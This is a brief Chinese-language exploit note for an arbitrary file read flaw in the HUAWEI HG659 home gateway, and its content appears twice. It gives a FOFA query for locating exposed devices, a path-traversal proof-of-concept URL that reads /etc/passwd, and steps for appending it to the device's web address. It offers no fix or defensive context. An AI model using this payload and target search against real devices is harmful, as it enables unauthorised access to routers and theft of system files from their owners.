1.漏洞描述
HUAWEI HG659 lib存在任意文件读取漏洞,攻击者可通过该漏洞读取任意文件。
2.网络资产查找
FOFA:app="HUAWEI-Home-Gateway-HG659"
3.POC
/lib///....//....//....//....//....//....//....//....//etc//passwd
4.漏洞复现
1)访问HUWEI HG659页面
2)在URL后添加POC
HUAWEI HG659 lib存在任意文件读取漏洞,攻击者可通过该漏洞读取任意文件。
FOFA:app="HUAWEI-Home-Gateway-HG659"
/lib///....//....//....//....//....//....//....//....//etc//passwd
1)访问HUWEI HG659页面
2)在URL后添加POC